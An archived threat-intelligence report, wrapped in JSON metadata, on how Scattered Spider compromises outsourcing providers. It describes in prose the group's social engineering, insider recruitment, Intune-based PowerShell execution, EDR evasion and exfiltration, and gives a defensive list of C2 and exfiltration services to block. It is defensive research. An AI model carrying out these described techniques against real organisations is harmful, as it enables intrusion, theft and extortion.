{ "id": "04ea5b91-89d3-4e3f-b562-02b7c39208ae", "created_at": "2026-04-06T00:22:24.971496Z", "updated_at": "2026-04-10T03:31:49.895811Z", "deleted_at": null, "sha1_hash": "73a55a682600a5a82a855c95313b8d7152df065b", "title": "Scattered Spider and Other Criminal Compromise of Outsourcing Providers Increases Victim Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 83851, "plain_text": "Scattered Spider and Other Criminal Compromise of Outsourcing\r\nProviders Increases Victim Attacks\r\nBy Halcyon RISE Team\r\nPublished: 2025-07-02 · Archived: 2026-04-05 17:17:27 UTC\r\nIndependent Halcyon research and open-source intelligence have identified several recent instances of\r\ncybercriminals, including Scattered Spider, compromising call centers and other third-party service companies—\r\nknown as Business Process Outsourcing (BPO) providers—to facilitate their attacks against larger numbers of\r\nvictims, often focused in one or a few sectors.  \r\nIn the first half of 2025, these compromises have enabled threat actors to steal hundreds of millions of dollars\r\nfrom a crypto firm, as well as Scattered Spider’s compromise of multiple victims in the retail and insurance\r\nindustries.\r\nExecutive Summary:\r\nEnforce phishing-resistant MFA (e.g., number-matching, hardware tokens) across both internal users and\r\nthird-party service accounts.\r\nEliminate voice/text-based MFA and disable legacy authentication protocols to prevent credential replay\r\nand bypass.\r\nAudit access and activity from BPO or managed service provider (MSP) partners, especially device\r\nmonitoring, privileged access use, and insider risk reporting.\r\nMonitor for spoofed domains, suspicious login flows, or cloned authentication pages—especially those\r\nmimicking helpdesk or HR communications.\r\nOperational Impact  \r\nA successful intrusion at a BPO can lead to rapid lateral access across dozens of client environments, introducing\r\na dangerous multiplier effect for organizations that rely on third-party service providers.  \r\nRecent Scattered Spider attacks against UK retail and US insurance industries likely originated, at least in part,\r\nfrom the group’s compromise of BPO companies. Scattered Spider (also tracked as UNC3944, Starfraud, Scatter\r\nSwine, and Muddled Libra) has shown sustained activity since 2022. The group is highly adept at social\r\nengineering, often masquerading as IT staff, and is known for deep reconnaissance of victim environments before\r\nmoving to active stages of attack.  \r\nScattered Spider has used BPO compromise at least since its compromise of a major casino in 2023. As the group\r\nintensifies its focus on high-value sectors in the United States, use of BPO providers without additional safeguards\r\npresents a significant supply chain risk.\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 1 of 6\n\nFor business leaders, this represents more than an IT issue—it’s a business continuity risk. Threat actors can lock\r\ndown cloud infrastructure, steal sensitive IP, or extort companies with stolen data. In extreme cases, organizations\r\nmay lose access to their primary identity providers or SaaS environments, halting operations for days or weeks.\r\nThe cost of such an attack can far exceed ransom demands, with reputational damage, legal exposure, and\r\noperational losses compounding quickly.  \r\nThis report expands upon the Halcyon analysis of Scattered Spider’s attack chain and pulls back the curtain on\r\ntheir suspected BPO-centric attack lifecycle. What follows is a phase-by-phase breakdown specific to the group’s\r\nleveraging of BPO providers mapped to the MITRE ATT\u0026CK framework to equip defenders with the context and\r\nunderstanding needed to detect, disrupt, and reduce organizational risk regarding this evolving and highly\r\nimpactful ransomware threat.\r\nTargeting and Industry Rotation  \r\nScattered Spider demonstrates a calculated and opportunistic targeting strategy, rotating across industries and\r\ngeographies based on visibility, payout potential, and operational heat. The group recently shifted its focus more\r\nheavily toward US sectors such as transportation (aviation)—industries with high reliance on remote access\r\ninfrastructure and high-value extortion potential. This adaptive targeting pattern allows Scattered Spider to stay\r\noperational and profitable even as defenders close gaps in previously targeted regions and sectors.\r\nOther known sectors targeted by the group include insurance, manufacturing, and food production—all of which\r\nare heavily reliant on BPOs, third-party SaaS platforms, and remote access tools. These industries often present\r\ncomplex supply chains, inconsistent security hygiene, and high consequences for downtime, making them ideal\r\ncandidates for extortion-based operations.\r\nThis adaptive strategy allows Scattered Spider to remain operational and profitable even as law enforcement\r\nattention intensifies, reinforcing the need for cross-sector threat intelligence sharing and proactive detection of\r\nlateral movement within interconnected vendor environments. [T1589.001, T1591.002, T1598.002, T1584]\r\nInsider Recruitment \u0026 BPO Weaknesses  \r\nScattered Spider has consistently leveraged insider recruitment as a strategic enabler, particularly within poorly\r\nmonitored BPO environments. These operations often exploit a combination of social engineering, financial\r\nincentives, and personal vulnerabilities to convince employees to facilitate access or execute specific tasks on\r\nbehalf of the attackers.\r\nRecruitment efforts typically begin via platforms like LinkedIn, Telegram, or WhatsApp, where operators identify\r\nindividuals with privileged access or exposure to identity systems, customer service platforms, or endpoint\r\ntooling. Employees facing financial stress, social instability, or limited institutional oversight are especially at risk.\r\nIn some cases, insiders are paid by the threat actors to install remote access software, approve MFA prompts, or\r\ntemporarily hand off control of their session. In others, they may be asked to test detection boundaries by\r\ndeploying tooling or copying files.\r\nThese insider facilitators are instrumental in establishing or maintaining long-term access—particularly in BPO\r\nenvironments where endpoint logging, identity governance, or behavioral monitoring is limited or fragmented.\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 2 of 6\n\n[T1585.001, T1586.003, T1566.002]\r\nInitial Access  \r\nAfter gaining access to a BPO provider, initial access vectors against downstream victims would likely have\r\nincluded credential phishing via spoofed HR messages (e.g., fake reduction-in-force notifications) and IT alerts\r\ncrafted to induce urgency or compliance.  \r\nThese lures are typically engineered using typographical obfuscation (e.g., Cyrillic characters, swapped letters)\r\nand link to cloned login portals that closely mimic legitimate authentication pages, often replicating the\r\norganization’s exact MFA workflow, such as Duo push prompts or Okta sign-ins.\r\nIn parallel, callback phishing campaigns may have been used to reinforce trust or escalate access. Victims receive\r\nmessages over email or Microsoft Teams instructing them to call a fake support number, where operators\r\nimpersonate IT staff and guide users through downloading remote access tools like AnyDesk or ScreenConnect.  \r\nThis hybrid social engineering approach allows the attackers to bypass technical controls and gain interactive\r\naccess to privileged user sessions, effectively accelerating the compromise chain. [T1566.001, T1566.002, T1078]\r\nPersistence and Privilege Escalation  \r\nOnce inside, the threat actors likely enrolled new MFA tokens to maintain persistent access and evade detection.\r\nThey have been observed using Azure Intune to execute Base64-encoded PowerShell payloads, which deploy\r\nadditional tooling or manipulate device management policies. This allows them to sideload custom endpoint\r\ndetection and response (EDR) bypasses or maintain long-term presence under the guise of legitimate\r\nadministrative activity.\r\nTo escalate privileges, the group may exploit misconfigurations or leverage existing elevated accounts, including\r\nservice principals or unattended admin sessions. In multiple documented cases, Scattered Spider actors removed\r\nall global administrators from compromised Azure tenants, effectively locking out defenders and delaying\r\nremediation.  \r\nThis tactic disables centralized visibility and control, forcing victims into a reactive position and complicating\r\nrecovery timelines. Additionally, the group is known to persist via compromised service accounts or devices\r\nmasquerading as trusted endpoints, further reducing the likelihood of detection. [T1078.004, T1546.008, T1068,\r\nT1548]\r\nData Exfiltration  \r\nThe group likely focused heavily on the exfiltration of internal IT documentation like detailed blueprints of the\r\nvictim’s infrastructure, access controls, and privileged workflows. These documents often contain hardcoded\r\ncredentials, API tokens, cloud tenant mappings, network diagrams, and service account usage patterns, making\r\nthem incredibly valuable for both immediate exploitation and resale to other threat actors.\r\nScattered Spider actors have been observed using legitimate backup and file replication tools like Veeam, as well\r\nas cloud storage services such as Mega, GoFile.io, Transfer.sh, and Zenfiles, to exfiltrate this data covertly. In\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 3 of 6\n\nmore sophisticated cases, exfiltration occurs through compromised cloud tenants, allowing attackers to stage and\r\ntransfer data under the guise of normal business operations. These tactics allow the group to bypass outbound\r\nfiltering and detection, especially in environments where backup or sync tools are already allow-listed by default.\r\nThe result is a high-fidelity theft operation that is often completed before encryption or other disruptive actions\r\noccur, giving Scattered Spider significant leverage during the extortion phase. [T1041, T1567.002]\r\nRansomware Deployment  \r\nEncryption is typically not the immediate goal for Scattered Spider, but rather an escalation tactic deployed when\r\nvictims resisted extortion demands or showed signs of initiating incident response. This approach aligns with a\r\nbroader data-first extortion model, where the threat actor seeks to monetize exfiltrated information before\r\ntriggering visible disruption.\r\nThe group has been linked to multiple ransomware payloads, including Akira, Play, Qilin, and DragonForce, each\r\nof which offers varying degrees of customization and stealth. Notably, Scattered Spider appears to favor Conti-based encryptors, which are designed for speed and irreversibility. These payloads typically employ multi-threaded AES-256 encryption, with RSA-based key wrapping, and leave no built-in decryption path outside of\r\npayment. This technical choice reflects a strategic intent to maximize pressure on the victim, either to push them\r\ntoward ransom negotiations or punish them for defiance.\r\nBecause encryption is often delayed until late in the attack lifecycle, organizations may not realize they have been\r\ncompromised until business operations are already at risk. [T1486, T1489, T1562.001]\r\nDetection and Containment Gaps  \r\nScattered Spider’s use of Bring Your Own Vulnerable Driver (BYOVD) techniques, endpoint detection and\r\nresponse (EDR) evasion via custom Rust- and Go-based binaries, and selective targeting of poorly monitored\r\nsystems reveals a sophisticated awareness of modern detection blind spots. BYOVD payloads are often deployed\r\nto disable kernel-level protections, terminate EDR processes, or sideload malicious code under the guise of\r\nlegitimate drivers. These drivers are sometimes custom-compiled or sourced from leaked vulnerability repositories\r\nand paired with obfuscated loaders to further reduce detection.\r\nIn addition to BYOVD, the group develops lightweight custom payloads often written in Rust or Go that are\r\ndesigned for speed, in-memory execution, and low forensic footprint. These payloads may be used to disable\r\nlogging, bypass Antimalware Scan Interface (AMSI), or interact directly with APIs to enumerate or disable\r\nendpoint defenses.\r\nScattered Spider prioritizes lateral movement toward systems explicitly excluded from monitoring, such as public-facing web apps, jump boxes, or environments running legacy software. They also take advantage of over-permissive allow-lists within EDR and Security Information and Event Management (SIEM) tooling by staging\r\npayloads in directories trusted by default or used by third-party applications. This allows them to remain\r\nundetected long enough to deploy payloads or exfiltrate data. [T1027, T1218, T1562, T1053.005, T1548.002,\r\nT1611]\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 4 of 6\n\nBehavioral Triggers  \r\nOperators closely monitor internal communications, ticketing systems, and file shares for any reference to their\r\naliases or activity, including names like Scattered Spider, Muddled Libra, Starfraud, or related IOCs. This internal\r\nsurveillance is often enabled through compromised email inboxes, cloud admin panels, or service accounts with\r\naccess to shared collaboration tools. Their goal is to identify when defenders have detected their presence or are\r\npreparing for an incident response operation.\r\nMentions of specific security vendors such as Halcyon, CrowdStrike, or Mandiant can serve as a trigger for attack\r\nescalation. When detected, operators are known to shift into a rapid execution phase, deploying ransomware and\r\nlocking out admin users within hours, sometimes the same day. In many cases, these accelerations occur before\r\nthe victim’s security team has a chance to fully mobilize.\r\nThis defensive evasion tactic transforms passive reconnaissance into an active kill switch, where the threat actor\r\ncontrols when and how disruption occurs based on perceived detection. [T1114.002, T1087.002, T1056.001]\r\nGroup Structure and Tradecraft Variation  \r\nScattered Spider operates as a decentralized but tightly aligned group, with a clear division of roles and\r\nresponsibilities among its members. Senior operators and group leaders often function as project managers,\r\ncoordinating initial access brokers, ransomware affiliates, and negotiators while managing communications and\r\noperational timing. Meanwhile, junior affiliates or newcomers are frequently observed conducting lower-tier\r\noperations to prove themselves, such as deploying off-the-shelf tools, testing detection thresholds, or handling\r\ninitial phishing campaigns.\r\nThis tiered structure results in variable tradecraft: some intrusions are executed with extreme speed and precision\r\nfeaturing ransomware deployment in under an hour, while others involve weeks of stealthy lateral movement, data\r\nstaging, and extortion preparation. Tradecraft variation is often a function of operator maturity, assigned objective,\r\nand the group’s perceived level of urgency. In some cases, operators deliberately slow-roll intrusions to avoid\r\ntriggering defenses and preserve long-term access to high-value targets.\r\nThe group’s organizational model enables scalability while minimizing risk exposure and may draw talent or\r\ntooling from other ransomware crews, including former members of Conti or Black Basta. [T1583.001,\r\nT1584.001, T1585.002]\r\nDetection, Mitigation \u0026 Incident Response  \r\nOrganizations should assume that Scattered Spider or similar threat actors may already be present within\r\noutsourced environments, particularly BPO infrastructures. Effective response requires:\r\nStrengthen Endpoint Coverage: Ensure all systems—especially those managed by vendors—are\r\nprotected with EPP and EDR/XDR. To detect attacks that routinely evade traditional tools, organizations\r\nshould also deploy dedicated anti-ransomware and anti-exfiltration solutions capable of identifying stealthy\r\nencryption and data theft behaviors.\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 5 of 6\n\nLog Visibility Across Third Parties: Ensure security teams have access to relevant logs, including\r\nauthentication events, from vendors and support providers.\r\nAudit Remote Tools: Look for unauthorized or excessive use of remote monitoring and management\r\n(RMM) tools (e.g., AnyDesk, ScreenConnect, Atera) and scripting platforms such as PowerShell or cmd-based launchers.\r\nWatch for Intune Abuse: Monitor for unusual Base64 task execution through Microsoft Intune or similar\r\nplatforms.\r\nDetect MFA Changes: Flag unexpected MFA device registrations—especially from unrecognized\r\ngeographies or source networks.\r\nMonitor for Known C2 Patterns: Block or alert on traffic to ngrok, Mega, GoFile.io, and similar services\r\noften abused for command-and-control or exfiltration.\r\nHarden Identity Infrastructure: Temporarily disable legacy authentication, enforce conditional access\r\npolicies, and cut SSO integration into critical tools in the event of an incident.\r\nPrepare for Tenant Lockout Scenarios: Develop and rehearse recovery playbooks that assume loss of\r\ncontrol over cloud tenants or identity providers.\r\nConclusion  \r\nThis report builds on prior Halcyon analysis of Scattered Spider’s TTPs to spotlight how supply chain exposure—\r\nparticularly through Business Process Outsourcing (BPO) providers—can rapidly cascade across sectors and\r\nborders. The group’s use of social engineering, insider recruitment, and infrastructure abuse illustrates how\r\nmodern ransomware actors have evolved into full-spectrum, persistent threats capable of operating across both\r\ntechnical and human attack surfaces.\r\nOrganizations will reduce this significant risk by going beyond hardening internal defenses, to also continuously\r\nassess the security posture of their third-party partners, especially those with elevated access or remote\r\nmanagement roles. This includes validating identity governance controls, understanding how insider risk is\r\nreported and managed, and ensuring visibility into outsourced operations.\r\nHalcyon eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent\r\nransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies –\r\ntalk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference\r\nguide, Power Rankings: Ransomware Malicious Quartile.\r\nSource: https://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nhttps://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.halcyon.ai/blog/scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks" ], "report_names": [ "scattered-spider-and-other-criminal-compromise-of-outsourcing-providers-increases-victim-attacks" ], "threat_actors": [ { "id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8", "created_at": "2023-06-23T02:04:34.386651Z", "updated_at": "2026-04-10T02:00:04.772256Z", "deleted_at": null, "main_name": "Muddled Libra", "aliases": [ "0ktapus", "Scatter Swine", "Scattered Spider" ], "source_name": "ETDA:Muddled Libra", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c", "created_at": "2023-11-01T02:01:06.643737Z", "updated_at": "2026-04-10T02:00:05.340198Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944" ], "source_name": "MITRE:Scattered Spider", "tools": [ "WarzoneRAT", "Rclone", "LaZagne", "Mimikatz", "Raccoon Stealer", "ngrok", "BlackCat", "ConnectWise" ], "source_id": "MITRE", "reports": null }, { "id": "6608b798-f92b-42af-a93f-d72800eeb3a3", "created_at": "2023-11-30T02:00:07.292Z", "updated_at": "2026-04-10T02:00:03.482199Z", "deleted_at": null, "main_name": "DragonForce", "aliases": [], "source_name": "MISPGALAXY:DragonForce", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "843f4240-33a7-4de4-8dcf-4ff9f9a8c758", "created_at": "2025-07-24T02:05:00.538379Z", "updated_at": "2026-04-10T02:00:03.657424Z", "deleted_at": null, "main_name": "GOLD FLAME", "aliases": [ "DragonForce" ], "source_name": "Secureworks:GOLD FLAME", "tools": [ "ADFind", "AnyDesk", "Cobalt Strike", "FileSeek", "Mimikatz", "SoftPerfect Network Scanner", "SystemBC", "socks.exe" ], "source_id": "Secureworks", "reports": null }, { "id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0", "created_at": "2023-10-03T02:00:08.510742Z", "updated_at": "2026-04-10T02:00:03.374705Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "UNC3944", "Scattered Swine", "Octo Tempest", "DEV-0971", "Starfraud", "Muddled Libra", "Oktapus", "Scatter Swine", "0ktapus", "Storm-0971" ], "source_name": "MISPGALAXY:Scattered Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null }, { "id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9", "created_at": "2023-10-14T02:03:13.99057Z", "updated_at": "2026-04-10T02:00:04.531987Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "0ktapus", "LUCR-3", "Muddled Libra", "Octo Tempest", "Scatter Swine", "Scattered Spider", "Star Fraud", "Storm-0875", "UNC3944" ], "source_name": "ETDA:Scattered Spider", "tools": [ "ADRecon", "AnyDesk", "ConnectWise", "DCSync", "FiveTran", "FleetDeck", "Govmomi", "Hekatomb", "Impacket", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Lumma Stealer", "LummaC2", "Mimikatz", "Ngrok", "PingCastle", "ProcDump", "PsExec", "Pulseway", "Pure Storage FlashArray", "Pure Storage FlashArray PowerShell SDK", "RedLine Stealer", "Rsocx", "RustDesk", "ScreenConnect", "SharpHound", "Socat", "Spidey Bot", "Splashtop", "Stealc", "TacticalRMM", "Tailscale", "TightVNC", "VIDAR", "Vidar Stealer", "WinRAR", "WsTunnel", "gosecretsdump" ], "source_id": "ETDA", "reports": null }, { "id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824", "created_at": "2024-06-19T02:03:08.062614Z", "updated_at": "2026-04-10T02:00:03.655475Z", "deleted_at": null, "main_name": "GOLD HARVEST", "aliases": [ "Octo Tempest ", "Roasted 0ktapus ", "Scatter Swine ", "Scattered Spider ", "UNC3944 " ], "source_name": "Secureworks:GOLD HARVEST", "tools": [ "AnyDesk", "ConnectWise Control", "Logmein" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434944, "ts_updated_at": 1775791909, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.pdf", "text": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.txt", "img": "https://archive.orkl.eu/73a55a682600a5a82a855c95313b8d7152df065b.jpg" } }